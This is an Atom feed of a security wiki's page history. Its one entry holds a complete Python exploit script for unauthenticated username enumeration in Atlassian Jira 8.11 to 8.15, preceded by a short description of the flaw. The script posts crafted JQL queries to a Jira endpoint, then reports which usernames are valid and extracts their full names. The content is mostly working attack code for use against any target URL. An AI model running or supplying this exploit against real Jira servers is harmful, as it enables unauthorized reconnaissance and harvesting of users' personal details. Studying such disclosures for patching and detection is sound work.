<?xml version="1.0"?>
<feed xmlns="http://www.w3.org/2005/Atom" xml:lang="chinese">
	<id>https://pwnwiki.com/index.php?action=history&amp;feed=atom&amp;title=Atlassian_Jira_8.15.0_%E4%BF%A1%E6%81%AF%E6%B3%84%E6%BC%8F%EF%BC%88%E7%94%A8%E6%88%B6%E5%90%8D%E6%9E%9A%E8%88%89%EF%BC%89%E6%BC%8F%E6%B4%9E</id>
	<title>Atlassian Jira 8.15.0 信息泄漏（用戶名枚舉）漏洞 - Revision history</title>
	<link rel="self" type="application/atom+xml" href="https://pwnwiki.com/index.php?action=history&amp;feed=atom&amp;title=Atlassian_Jira_8.15.0_%E4%BF%A1%E6%81%AF%E6%B3%84%E6%BC%8F%EF%BC%88%E7%94%A8%E6%88%B6%E5%90%8D%E6%9E%9A%E8%88%89%EF%BC%89%E6%BC%8F%E6%B4%9E"/>
	<link rel="alternate" type="text/html" href="https://pwnwiki.com/index.php?title=Atlassian_Jira_8.15.0_%E4%BF%A1%E6%81%AF%E6%B3%84%E6%BC%8F%EF%BC%88%E7%94%A8%E6%88%B6%E5%90%8D%E6%9E%9A%E8%88%89%EF%BC%89%E6%BC%8F%E6%B4%9E&amp;action=history"/>
	<updated>2026-04-16T06:58:08Z</updated>
	<subtitle>Revision history for this page on the wiki</subtitle>
	<generator>MediaWiki 1.35.1</generator>
	<entry>
		<id>https://pwnwiki.com/index.php?title=Atlassian_Jira_8.15.0_%E4%BF%A1%E6%81%AF%E6%B3%84%E6%BC%8F%EF%BC%88%E7%94%A8%E6%88%B6%E5%90%8D%E6%9E%9A%E8%88%89%EF%BC%89%E6%BC%8F%E6%B4%9E&amp;diff=3888&amp;oldid=prev</id>
		<title>Pwnwiki: Created page with &quot;==EXP== &lt;pre&gt; # Exploit Title: Atlassian Jira 8.15.0 - Information Disclosure (Username Enumeration) # Date: 31/05/2021 # Exploit Author: Mohammed Aloraimi # Vendor Homepage:...&quot;</title>
		<link rel="alternate" type="text/html" href="https://pwnwiki.com/index.php?title=Atlassian_Jira_8.15.0_%E4%BF%A1%E6%81%AF%E6%B3%84%E6%BC%8F%EF%BC%88%E7%94%A8%E6%88%B6%E5%90%8D%E6%9E%9A%E8%88%89%EF%BC%89%E6%BC%8F%E6%B4%9E&amp;diff=3888&amp;oldid=prev"/>
		<updated>2021-06-02T01:14:02Z</updated>

		<summary type="html">&lt;p&gt;Created page with &amp;quot;==EXP== &amp;lt;pre&amp;gt; # Exploit Title: Atlassian Jira 8.15.0 - Information Disclosure (Username Enumeration) # Date: 31/05/2021 # Exploit Author: Mohammed Aloraimi # Vendor Homepage:...&amp;quot;&lt;/p&gt;
&lt;p&gt;&lt;b&gt;New page&lt;/b&gt;&lt;/p&gt;&lt;div&gt;==EXP==&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
# Exploit Title: Atlassian Jira 8.15.0 - Information Disclosure (Username Enumeration)&lt;br /&gt;
# Date: 31/05/2021&lt;br /&gt;
# Exploit Author: Mohammed Aloraimi&lt;br /&gt;
# Vendor Homepage: https://www.atlassian.com/&lt;br /&gt;
# Software Link: https://www.atlassian.com/software/jira&lt;br /&gt;
# Vulnerable versions: version 8.11.x to 8.15.0&lt;br /&gt;
# Tested on: Kali Linux&lt;br /&gt;
# Proof Of Concept:&lt;br /&gt;
&lt;br /&gt;
'''&lt;br /&gt;
A username information disclosure vulnerability exists in Atlassian JIRA from versions 8.11.x to 8.15.x. Unauthenticated users can ENUMRATE valid users via /secure/QueryComponent!Jql.jspa endpoint.&lt;br /&gt;
&lt;br /&gt;
Tested versions:&lt;br /&gt;
&lt;br /&gt;
Atlassian JIRA 8.11.1&lt;br /&gt;
Atlassian JIRA 8.13&lt;br /&gt;
Atlassian JIRA 8.15&lt;br /&gt;
'''&lt;br /&gt;
&lt;br /&gt;
#!/usr/bin/env python&lt;br /&gt;
&lt;br /&gt;
__author__  = &amp;quot;Mohammed Aloraimi (@ixSly)&amp;quot;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
import requests&lt;br /&gt;
import sys&lt;br /&gt;
import re&lt;br /&gt;
import urllib3&lt;br /&gt;
urllib3.disable_warnings()&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
def help():&lt;br /&gt;
    print('python script.py &amp;lt;target&amp;gt; &amp;lt;username&amp;gt;')&lt;br /&gt;
    print('e.g. python script.py https://jiratarget.com admin')&lt;br /&gt;
    sys.exit()&lt;br /&gt;
&lt;br /&gt;
if len(sys.argv) &amp;lt; 3:&lt;br /&gt;
  help()&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
def pwn(url,username):&lt;br /&gt;
&lt;br /&gt;
        try:&lt;br /&gt;
                headers = {&amp;quot;content-type&amp;quot;: &amp;quot;application/x-www-form-urlencoded; charset=UTF-8&amp;quot;}&lt;br /&gt;
                data=&amp;quot;jql=creator+in+({})&amp;amp;decorator=none&amp;quot;.format(username)&lt;br /&gt;
                req = requests.post(url+&amp;quot;/secure/QueryComponent!Jql.jspa&amp;quot;,headers=headers,verify=False,data=data)&lt;br /&gt;
                if &amp;quot;issue.field.project&amp;quot; in req.text and req.status_code == 200:&lt;br /&gt;
                        print(&amp;quot;[+] {} is a Valid User&amp;quot;.format(username))&lt;br /&gt;
                        userFullName=re.search('value=\&amp;quot;user:{}\&amp;quot; title=\&amp;quot;(.+?)\&amp;quot;'.format(username),str(req.json()[&amp;quot;values&amp;quot;][&amp;quot;creator&amp;quot;]).strip())&lt;br /&gt;
                        if userFullName:&lt;br /&gt;
                                print(&amp;quot;[+] User FullName: &amp;quot; + userFullName.group(1))&lt;br /&gt;
                elif '[&amp;quot;jqlTooComplex&amp;quot;]' in req.text and req.status_code == 401:&lt;br /&gt;
                        print(&amp;quot;[-] {} is not a Valid User&amp;quot;.format(username))&lt;br /&gt;
                else:&lt;br /&gt;
                        print(&amp;quot;[-] Error..&amp;quot;)&lt;br /&gt;
        except Exception as e:&lt;br /&gt;
                print(str(e))&lt;br /&gt;
                pass&lt;br /&gt;
&lt;br /&gt;
server = sys.argv[1]&lt;br /&gt;
username = sys.argv[2]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
pwn(server,username)&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;/div&gt;</summary>
		<author><name>Pwnwiki</name></author>
	</entry>
</feed>